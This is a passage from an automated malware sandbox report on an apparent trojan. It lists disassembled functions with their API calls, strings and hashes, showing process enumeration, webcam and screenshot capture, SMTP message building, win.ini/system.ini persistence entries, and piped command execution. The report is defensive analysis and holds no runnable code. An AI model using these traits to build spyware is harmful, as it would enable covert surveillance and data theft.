Process32First.KERNEL32(000000FF,00000128), ref: 004125E2
CharLowerA.USER32(00000000,system,000000FF,00000128), ref: 0041262D
lstrcmp.KERNEL32(00000000,00000000), ref: 00412633
CharLowerA.USER32(00000000,[system process],00000000,00000000,system,000000FF,00000128), ref: 0041269B
lstrcmp.KERNEL32(00000000,00000000), ref: 004126A1
CharLowerA.USER32(services.exe,00000000,00000000,[system process],00000000,00000000,system,000000FF,00000128), ref: 004126D5
CharLowerA.USER32(00000000,00000000,services.exe,00000000,00000000,[system process],00000000,00000000,system,000000FF,00000128), ref: 0041270F
lstrcmp.KERNEL32(00000000,00000000), ref: 00412715

Strings

system, xrefs: 004125F4
services.exe, xrefs: 004126D0
,, xrefs: 00412758
[system process], xrefs: 00412662

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CharLower$lstrcmp$CreateFirstProcess32SnapshotToolhelp32
String ID: ,$[system process]$services.exe$system
API String ID: 1627042252-748288378
Opcode ID: 7492e1895cca48741d7b88b8fddfd0c6c2ce0ce482b55aa017c8dd8ff1d3062f
Instruction ID: 90e38c15911c8e6986b2740595748af60925d49c1fce0e0903f44eb226358e8b
Opcode Fuzzy Hash: 7492e1895cca48741d7b88b8fddfd0c6c2ce0ce482b55aa017c8dd8ff1d3062f
Instruction Fuzzy Hash: A9611930D0020D9BDF10EFE5C946ADDB7B8FF99309F10856BE411B6252DB789A468B68

Uniqueness

Uniqueness Score: -1.00%

Function 00461030 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 331windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00461246
CreateCompatibleDC.GDI32(00000001), ref: 004612AB
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004612C0
SelectObject.GDI32(?,00000000), ref: 004612CA
SelectPalette.GDI32(?,?,00000000), ref: 004612FA
RealizePalette.GDI32(?), ref: 00461306
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0046132A
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00461383,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00461338
SelectPalette.GDI32(?,00000000,000000FF), ref: 0046136A
SelectObject.GDI32(?,?), ref: 00461377
DeleteObject.GDI32(00000000), ref: 0046137D

Strings

(, xrefs: 00461195

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: (
API String ID: 2831685396-3887548279
Opcode ID: 500723fee67303b915d5e40b3883316f766e34d51d434328d2e932176a08e09f
Instruction ID: 466aaad474f79899256e4f71da6948c9367aca9719b4840650b7218050669a78
Opcode Fuzzy Hash: 500723fee67303b915d5e40b3883316f766e34d51d434328d2e932176a08e09f
Instruction Fuzzy Hash: 71D14D74A002089FDF14DFA9C885AAEBBF5FF49304F14856AF904EB365D7389841CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00418784 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 259windowCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004187F2
6CC621E0.AVICAP32(00000000,50000000,00000000,00000000,00000140,000000F0,00000000,00000001,?,00000104), ref: 00418944
IsWindow.USER32(00000000), ref: 00418954
SendMessageA.USER32(0000040A,00000000,00000000,50000000), ref: 0041896C
IsWindow.USER32(50000000), ref: 004189B3
SendMessageA.USER32(0000043C,00000000,00000000,50000000), ref: 004189CB
IsWindow.USER32(50000000), ref: 004189D6
SendMessageA.USER32(00000419,00000000,00000000,50000000), ref: 004189F5
IsWindow.USER32(50000000), ref: 00418A00
SendMessageA.USER32(00000432,000000FF,00000000,50000000), ref: 00418A18
IsWindow.USER32 ref: 00418A6F
SendMessageA.USER32(0000040B,00000000,00000000), ref: 00418A87

Strings

h, xrefs: 00418AF3
\p_ekran.jpg, xrefs: 00418882
\p_ekran.bmp, xrefs: 00418809

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: MessageSendWindow$C621DirectoryWindows
String ID: \p_ekran.bmp$\p_ekran.jpg$h
API String ID: 2970199885-2515384798
Opcode ID: 3bdc0d70a8e33cbdded611faed4af09e9ad6cf6dc4ca9042b0be185b3c071c7f
Instruction ID: 85ba35625fe2574860955d2f8a40a99b5e576abf93c5dee3dfc85d03274bff11
Opcode Fuzzy Hash: 3bdc0d70a8e33cbdded611faed4af09e9ad6cf6dc4ca9042b0be185b3c071c7f
Instruction Fuzzy Hash: AAB16034A002099BDB10EBD1D841BDDB7B5FF85308F10416BE9047B2A2DB79AE4ADB59

Uniqueness

Uniqueness Score: -1.00%

Function 004434BC Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 204timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0048C710: GetLocalTime.KERNEL32(?), ref: 0048C718

@Smtpprot@Rfc822DateTime$qqr16System@TDateTime.LNCOM ref: 004436F0
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v.LNCOM(?,?,00000000,00000162), ref: 00443760

Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@CheckReady$qqrv.LNCOM(00000000,00442DC3), ref: 00442CED
Part of subcall function 00442CA8: @Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM ref: 00442D9D

Strings

Mime-Version: 1.0, xrefs: 00443695
From: , xrefs: 004435B4
Sender: , xrefs: 0044363A, 0044367A
Return-Path: , xrefs: 00443590
Content-Type: , xrefs: 004436A8
To: , xrefs: 004435D8
Date: , xrefs: 004436FB
Reply-To: , xrefs: 00443552
; charset=", xrefs: 004436B3
DATA, xrefs: 00443756
Subject: , xrefs: 004435FC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Smtpprot@$Smtp$Client@Custom$DateStateSystem@Time$AnsiAsync$qqr21Change$qqr19CheckExecLocalReady$qqrvRequest17Rfc822Stringpxusxiynpqqrv$vTime$qqr16
String ID: ; charset="$Content-Type: $DATA$Date: $From: $Mime-Version: 1.0$Reply-To: $Return-Path: $Sender: $Subject: $To:
API String ID: 27605779-686675467
Opcode ID: add6ba763f0ab795d200b8b4fe20bf3c160dde17646a082dcd0af1d7ad7145cd
Instruction ID: 7867926ed3f2a26e9d6c057ce6aa02debc1db5f7f3e7aafa8ad82233ac697ced
Opcode Fuzzy Hash: add6ba763f0ab795d200b8b4fe20bf3c160dde17646a082dcd0af1d7ad7145cd
Instruction Fuzzy Hash: 2EA1C178A00109EFDB04EF94C5859DDBBF1FF89705B6081A9E900AB362DB34EE42DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004607C8 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00460DA8: GetDC.USER32(00000000), ref: 00460DFE
Part of subcall function 00460DA8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00460E13
Part of subcall function 00460DA8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00460E1D
Part of subcall function 00460DA8: CreateHalftonePalette.GDI32(00000000,00000000,?,00000000,?,?,00460CCA,?,?,00460C32,?,?,005D9C24,?,004B63EB), ref: 00460E41
Part of subcall function 00460DA8: ReleaseDC.USER32(00000000,00000000), ref: 00460E4C

SelectPalette.GDI32(?,?,000000FF), ref: 0046080A
RealizePalette.GDI32(?), ref: 00460819
GetDeviceCaps.GDI32(?,0000000C), ref: 0046082B
GetDeviceCaps.GDI32(?,0000000E), ref: 0046083A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0046086E
SetStretchBltMode.GDI32(?,00000004), ref: 0046087C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00460894
SetStretchBltMode.GDI32(00000000,00000003), ref: 004608B1
CreateCompatibleDC.GDI32(00000000), ref: 00460911
SelectObject.GDI32(?,?), ref: 00460926
SelectObject.GDI32(?,00000000), ref: 00460985
DeleteDC.GDI32(00000000), ref: 00460994

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: c3ea6ad3e21f3816fe9f147b5ea0d488f7f0497684ead816db2dd6426fe3c6f3
Instruction ID: 749ed39abfde7bf8a828eb33bbac37cfdd66626b42ae257329244a0fda74f5b6
Opcode Fuzzy Hash: c3ea6ad3e21f3816fe9f147b5ea0d488f7f0497684ead816db2dd6426fe3c6f3
Instruction Fuzzy Hash: A0711BB5A00205AFDB50DFADC985F9BB7F9EB08304F14855AF508E7252E638ED00CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0045CD6C Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0045CD83
CreateCompatibleDC.GDI32(00000000), ref: 0045CD8D
GetObjectA.GDI32(?,00000018,?), ref: 0045CDAD
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0045CDC4
GetDC.USER32(00000000), ref: 0045CDD0
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0045CDFD
ReleaseDC.USER32(00000000,00000000), ref: 0045CE23
SelectObject.GDI32(?,?), ref: 0045CE3E
SelectObject.GDI32(?,00000000), ref: 0045CE4D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0045CE79
SelectObject.GDI32(?,00000000), ref: 0045CE87
SelectObject.GDI32(?,00000000), ref: 0045CE95
DeleteDC.GDI32(?), ref: 0045CEAB
DeleteDC.GDI32(?), ref: 0045CEB4

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: 32dd7b33b656fba8093e071be3e520b91b9f670292d41ddfd7f0bd51a7ee6002
Instruction ID: 1c9c79e4216a142dc3e37354cf4e9447ae3793f778fc00dc358bc7d2bc3d4294
Opcode Fuzzy Hash: 32dd7b33b656fba8093e071be3e520b91b9f670292d41ddfd7f0bd51a7ee6002
Instruction Fuzzy Hash: 4C41F071A00309AFDB11DBE9CC96FAFB7BCEB08705F11445AFA04E7241D678A905C764

Uniqueness

Uniqueness Score: -1.00%

Function 00432B30 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_WSASetLastError$qqri.LNCOM ref: 00432B4D
@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00432B5A
@Wsocket@WSocket_closesocket$qqri.LNCOM ref: 00432B79
@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00432B9C
@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 00432BA8
@Wsocket@TCustomWSocket@SetLingerOption$qqrv.LNCOM ref: 00432BBC
@Wsocket@WSocket_WSAAsyncSelect$qqriuiii.LNCOM(00000033), ref: 00432BEC

Part of subcall function 00431ABC: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431AD9

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00432C02

Part of subcall function 004360D8: @Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004361B6), ref: 00436105
Part of subcall function 004360D8: @Wsocket@WSocketErrorDesc$qqri.LNCOM(004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436133
Part of subcall function 004360D8: @Wsocket@WSocket_closesocket$qqri.LNCOM(?,004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436163
Part of subcall function 004360D8: @Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 0043617A

@Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 00432C0E

Strings

WSAAsyncSelect, xrefs: 00432BFA
Dup, xrefs: 00432B52
Dup (closesocket), xrefs: 00432B94

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket$CustomSocket@$AnsiStringSystem@$ChangeError$qqr17Socket_StateState$qqr20$LastSocket_closesocket$qqri$AsyncDesc$qqriErrorError$qqriError$qqrvLingerOption$qqrvProc$qqrx17Select$qqriuiii
String ID: Dup$Dup (closesocket)$WSAAsyncSelect
API String ID: 1439055048-269506558
Opcode ID: 260f4ab66d6b6ad49a1d101ba78de794cd94000ea42c2418d030c44cd932edb0
Instruction ID: 3aa96124ae48a72cd4d2396a1df704ce48cfa2cccad63c9f1f6a8746b8e81166
Opcode Fuzzy Hash: 260f4ab66d6b6ad49a1d101ba78de794cd94000ea42c2418d030c44cd932edb0
Instruction Fuzzy Hash: 7E210674D04508EFCB10DF99C685A9DB7F0AF08318F24A2E6E5146B3A1C7B8AF40DB49

Uniqueness

Uniqueness Score: -1.00%

Function 0047C790 Relevance: 19.7, APIs: 13, Instructions: 207COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 0047C7C4
GetClientRect.USER32(00000000,?), ref: 0047C7E7
GetWindowRect.USER32(00000000,?), ref: 0047C7F9
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0047C80F
OffsetRect.USER32(?,?,?), ref: 0047C824
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0047C9FF), ref: 0047C83D
InflateRect.USER32(?,00000000,00000000), ref: 0047C85E
GetWindowLongA.USER32(00000000,000000F0), ref: 0047C8B7
DrawEdge.USER32(?,?,00000000,00000008), ref: 0047C983
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0047C99C
OffsetRect.USER32(?,?,?), ref: 0047C9BE
FillRect.USER32(?,?,00000000), ref: 0047C9DA
ReleaseDC.USER32(00000000,?), ref: 0047C9F9

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
String ID:
API String ID: 3115931838-0
Opcode ID: 79e72e85862ec1bc1b03475d5f5353f9b25c36d084ad5b88eebd49906e1f2f93
Instruction ID: 5398ca358b7cbd67a2d546f2e01a82c9b378ec87cb21745344ebd821f86594f9
Opcode Fuzzy Hash: 79e72e85862ec1bc1b03475d5f5353f9b25c36d084ad5b88eebd49906e1f2f93
Instruction Fuzzy Hash: BB81FB71E00148AFDB40DBA9C985FDEB7F9AF09304F1484A6F658E7251C738AE04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040E994 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 191COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

Strings

\win.ini, xrefs: 0040EA11
shell, xrefs: 0040EBA4
windows, xrefs: 0040EAB8
\system.ini, xrefs: 0040EB15
D, xrefs: 0040EC2E
Explorer.exe , xrefs: 0040EB95
boot, xrefs: 0040EBBC
, xrefs: 0040EA91
run, xrefs: 0040EAA0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DirectoryVersionWindows
String ID: $D$Explorer.exe $\system.ini$\win.ini$boot$run$shell$windows
API String ID: 2101683936-913663370
Opcode ID: 1dfa9445dfbf309e2d32e7bc6bc03c786c899e89a43b52f4557f67b9e8d375e8
Instruction ID: 48b26e22e11def672bdd491283a5b7f7c1ab87daf1b0395d117fe25d498d24bf
Opcode Fuzzy Hash: 1dfa9445dfbf309e2d32e7bc6bc03c786c899e89a43b52f4557f67b9e8d375e8
Instruction Fuzzy Hash: FE81F53591021ECFDB00EFD1D886ADDB7B9FF8A309F10806AE80567252D7B99A06CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD60 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 153synchronizationprocessfileCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0040CDED
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000020,00000000,00000000,?,?), ref: 0040CE78
CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000001,08000020,00000000,00000000,?,?), ref: 0040CE80
ReadFile.KERNEL32(?,?,000F4240,?,00000000,?,00000000,?,00000000,00000000,00000001,08000020,00000000,00000000,?,?), ref: 0040CEAC
CloseHandle.KERNEL32(?), ref: 0040CEFA
WaitForSingleObject.KERNEL32(?,000000FF,?), ref: 0040CF07
WaitForSingleObject.KERNEL32(?,000000FF,?,000000FF,?), ref: 0040CF14
CloseHandle.KERNEL32(?,?,000000FF,?,000000FF,?), ref: 0040CF1F
CloseHandle.KERNEL32(?,?,?,000000FF,?,000000FF,?), ref: 0040CF2A

Strings

,, xrefs: 0040CF6B
D, xrefs: 0040CE18

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseHandle$CreateObjectSingleWait$FilePipeProcessRead
String ID: ,$D
API String ID: 92413175-1313800889
Opcode ID: 5b86aeebfeb87de8681c8e500e1db3185f5e2da4adeda73796bbf4633defa7db
Instruction ID: a4b4e30f16c81bc46f6cee82a0c43205083fd4fb7d798d2966f53665f88e949c
Opcode Fuzzy Hash: 5b86aeebfeb87de8681c8e500e1db3185f5e2da4adeda73796bbf4633defa7db
Instruction Fuzzy Hash: 54516E7091021DAADF10EF91DC42FDDB779FF44304F10826AF508B6292EBB95A49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043163C Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 107libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,004317AE), ref: 00431679
GetLastError.KERNEL32(00000000,00000000,004317AE), ref: 0043168C
@Wsocket@WSocket_WSAStartup$qqrusr7WSAData.LNCOM(00000000,00000000,004317AE), ref: 004316CA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0043172C
GetLastError.KERNEL32( Error #,wsock32.dll, not found in ,?,Procedure ,00000000,004317AE), ref: 00431751

Strings

%s: WSAStartup error #%d, xrefs: 004316F4
Unable to load wsock32.dll Error #, xrefs: 004316A3
wsock32.dll, xrefs: 0043166E, 004316D8, 00431747
not found in , xrefs: 00431742
Error #, xrefs: 0043174C
Procedure , xrefs: 0043173A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ErrorLast$AddressDataLibraryLoadProcSocket_Startup$qqrusr7Wsocket@
String ID: Error #$ not found in $%s: WSAStartup error #%d$Procedure $Unable to load wsock32.dll Error #$wsock32.dll
API String ID: 1376957805-692728273
Opcode ID: 1f8947547ea69d9ffdf1fb16a12240e4e23575bae9a75210e941da022269eb7c
